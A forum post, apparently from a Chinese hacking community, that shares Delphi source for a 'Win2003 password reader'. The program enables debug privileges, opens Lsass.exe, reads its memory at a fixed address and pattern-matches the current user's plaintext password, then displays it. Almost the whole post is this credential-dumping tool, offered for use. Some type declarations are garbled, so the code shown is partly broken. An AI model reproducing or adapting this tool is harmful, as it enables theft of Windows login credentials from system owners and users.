Win2003 Server密碼讀取器1.0 [Delphi代碼]
什麼都不說了~既然有人認為我是轉載別人代碼改名字就說是自己寫的代碼
我也不在乎了...接著丟LJ~~
CODE:
{
Windows 2003 Server[Chinese]
密碼讀取器 V1.0 By Anskya
Email:Anskya@Email.com
Web:
www.Anskya.Net
感謝:WinEggDrop 提供的C源代碼...
也感謝許許多多的朋友支持和幫助
感謝:火狐技術聯盟的支持
www.Wrsky.com
}
program GetWin2003Pass;
uses
Windows,TlHelp32;
const
BaseAddress = $002b5000; //讀取密碼基址
TZM1:String = 'Remote Procedure Call (RPC)'; //第一條特徵碼
TZM2:String = #02#0#0#0#0#0#0; //第二條特徵碼
procedure MsgBox(Msgs:String);
begin
MessageBox(0,Pchar(Msgs),nil,0);
end;
procedure GetDebugPrivs; //提升工作行程訪問權限
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword;
begin
If (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then
begin
LookupPrivilegeValue(nil,'SeDebugPrivilege', tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end;
function Is2003:Boolean; //判斷當前系統是否是Windows 2003
var
osVerInfo: TOSVersionInfo;
begin
Result:=False;
ZeroMemory(@osVerInfo,sizeof(osVerInfo));
osVerInfo.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if GetVersionEx(osVerInfo) then
begin
if (osVerInfo.dwMajorVersion=5)and(osVerInfo.dwMinorVersion=2) then Result:=True;
end;
end;
function GetProcessPID(Process:Pchar)
WORD; //查找工作行程並返回PID
var
Process32: TProcessEntry32;
ProcessSnapshot: THandle;
begin
Result:=0;
ProcessSnapshot := CreateToolHelp32SnapShot(TH32CS_SNAPALL, 0);
Process32.dwSize := SizeOf(TProcessEntry32);
Process32First(ProcessSnapshot, Process32);
repeat
if lstrcmpi(Process,Process32.szExeFile) = 0 then Result:=Process32.th32ProcessID;
until not (Process32Next(ProcessSnapshot, Process32));
CloseHandle(ProcessSnapshot);
end;
function FindPassword(PID
WORD):String;//查找工作行程中的密碼
var
Buffer:string;
Ret
WORD;
I,iPos:Integer;
ProcessHandle
WORD;
begin
if PID =0 then Exit;
GetDebugPrivs;
ProcessHandle:=OpenProcess(PROCESS_VM_READ,FALSE,PID);
if ProcessHandle > 0 then
begin
SetLength(Buffer, 5120);
if ReadProcessMemory(ProcessHandle,Pointer(BaseAddress),Pchar(Buffer),5120,Ret) then
begin
iPos := Pos(TZM1, Buffer);
if iPos > 0 then
begin
Buffer:=Copy(Buffer,iPos,Length(Buffer));
iPos:=Pos(TZM2, Buffer);
if iPos>0 then
begin
iPos:=iPos+Length(TZM2);
Buffer:=Copy(Buffer,iPos,Length(Buffer));
for I:= 0 to Length(Buffer) do
begin
if Buffer[i] = #$80 then break;
if Buffer[i] <> #$00 then Result:=Result+Buffer[i];
end;
Result:=Pchar(Result);
end else MsgBox('掃瞄第二次特徵碼失敗');
end else MsgBox('掃瞄第一次特徵碼失敗');
end else MsgBox('Lsass.exe工作行程讀取失敗');
end else MsgBox('打開工作行程Lsass.exe失敗');
end;
procedure WinMain;
var
PID
WORD;
Password,StrTemp:String;
UserName:Array[0..MAX_PATH] of char;
UserLen
WORD;
begin
if Is2003 then
begin
PID:=(GetProcessPID('Lsass.exe'));
if PID>0 then
begin
Password:=FindPassword(PID);
if Password <> '' then
begin
if GetUserName(UserName,UserLen) then
begin
StrTemp:='當前用戶名:'+UserName+#10#13+'當前密碼:'+Password;
MessageBox(0,Pchar(StrTemp),'Win2003 密碼讀取器 V1.0 By Anskya',0);
end else MsgBox('獲取用戶名失敗');
end else MsgBox('獲取密碼失敗');
end else MsgBox('查找Lsass.exe失敗');
end else MsgBox('此系統不是Win2003');
end;
begin
WinMain;
end.